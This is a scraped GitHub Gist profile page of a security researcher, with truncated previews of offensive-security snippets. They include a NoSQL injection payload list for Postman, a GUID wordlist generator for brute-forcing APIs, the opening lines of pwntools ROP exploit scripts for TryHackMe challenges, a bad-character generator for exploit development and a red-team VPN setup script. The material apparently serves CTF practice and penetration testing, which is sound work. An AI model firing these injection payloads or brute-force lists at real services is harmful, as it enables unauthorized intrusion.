Skip to content

Instantly share code, notes, and snippets.

Avatar
☠️
Flippin' duh bits. Dumping core.

Dana Epp DanaEpp

☠️
Flippin' duh bits. Dumping core.
46 followers · 1 following
View GitHub Profile
@DanaEpp
DanaEpp / nosql-injection-payloads-for-postman.json
Created September 20, 2022 22:18
NoSQL injection payloads for Postman
View nosql-injection-payloads-for-postman.json
[
{"payload":"'"},
{"payload":"''"},
{"payload":";%00"},
{"payload":"--"},
{"payload":"-- -"},
{"payload":"\"\""},
{"payload":";"},
{"payload":"' OR '1"},
{"payload":"' OR 1 -- -"},
@DanaEpp
DanaEpp / guid_reaper.py
Created October 20, 2022 17:56
Tool to dump v1 GUIDs and generate a wordlist of GUIDs for use in bruteforce attacks against APIs with predictable GUIDs
View guid_reaper.py
#!/bin/env python3
import argparse
import datetime
import re
import sys
import uuid
###############################################################################
# Based off of Daniel Thatcher's guid tool
@DanaEpp
DanaEpp / dump-endpoints.jq
Created November 26, 2022 00:05
jq query and filter to dump the HTTP method, route and description of every endpoint in an OpenAPI 3.0 document. Usage: jq -r -f dump-endpoints.jq openapidoc.json
View dump-endpoints.jq
.paths | to_entries | map(select(.key | test("^x-") | not)) | map ( .key as $path | .value | to_entries | map( select( .key | IN("get", "put", "post", "delete", "options", "head", "patch", "trace")) | { method: .key, path: $path, summary: .value.summary?, deprecated: .value.deprecated? })[] ) | map( .method + "\t" + .path + "\t" + .summary + (if .deprecated then " (deprecated)" else "" end)) []
@DanaEpp
DanaEpp / thm-dump.py
Created June 26, 2022 05:18
TryHackMe (THM) dump script to find rooms with open tasks
View thm-dump.py
#!/bin/env python3
import getpass
import time
import requests
from requests.cookies import create_cookie
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import re
from typing import List
@DanaEpp
DanaEpp / exploit110.py
Last active May 10, 2022 23:43
THM PWN 101 - Challenge 10 (optimized using pwntools native ROP() chains)
View exploit110.py
#!/bin/env python3
import sys
from pwn import *
exe = "./pwn110.pwn110"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
def start(argv=[], *a, **kw):
@DanaEpp
DanaEpp / gist:18500ab8c14893da46ae095678a12f43
Last active May 7, 2022 22:10
THM PWN 101 - Challenge 9 (optimized using pwntools native ROP() chains)
View gist:18500ab8c14893da46ae095678a12f43
#!/bin/env python3
import sys
from pwn import *
exe = "./pwn109.pwn109"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
def start(argv=[], *a, **kw):
@DanaEpp
DanaEpp / setup_vpn.sh
Created May 12, 2021 22:26
My disposable VPN script I use during external #redteam engagements
View setup_vpn.sh
#!/bin/bash
# Author: Dana Epp (@danaepp)
GROUP_NAME="DisposableVPN"
VM_NAME="DisposableVPN"
REGION="canadacentral"
PORT="51820"
echo "Creating resource group '$GROUP_NAME'..."
@DanaEpp
DanaEpp / gen_badchars.py
Last active May 10, 2021 02:00
Quick script to generate badchars array during exploit development
View gen_badchars.py
#!/usr/bin/env python3
import sys
sys.stdout.write("badchars = (\n\tb\"")
pos = 0
for x in range(0,256):
sys.stdout.write( "\\x" + '{0:02x}'.format(x))
if pos == 15:
@DanaEpp
DanaEpp / setup_report_env.sh
Created March 30, 2021 15:40
Simple script to setup pandoc and latex for report gen on Kali
View setup_report_env.sh
#!/bin/bash
function needInstall() {
echo "Checking for $1..."
if ! [ -x "$(command -v $1)" ]; then
return 0;
else
return 1;
fi
@DanaEpp
DanaEpp / designer.html
Created March 12, 2015 00:17
designer
View designer.html
<link rel="import" href="../polymer/polymer.html">
<polymer-element name="my-element">
<template>
<style>
:host {
position: absolute;
width: 100%;
height: 100%;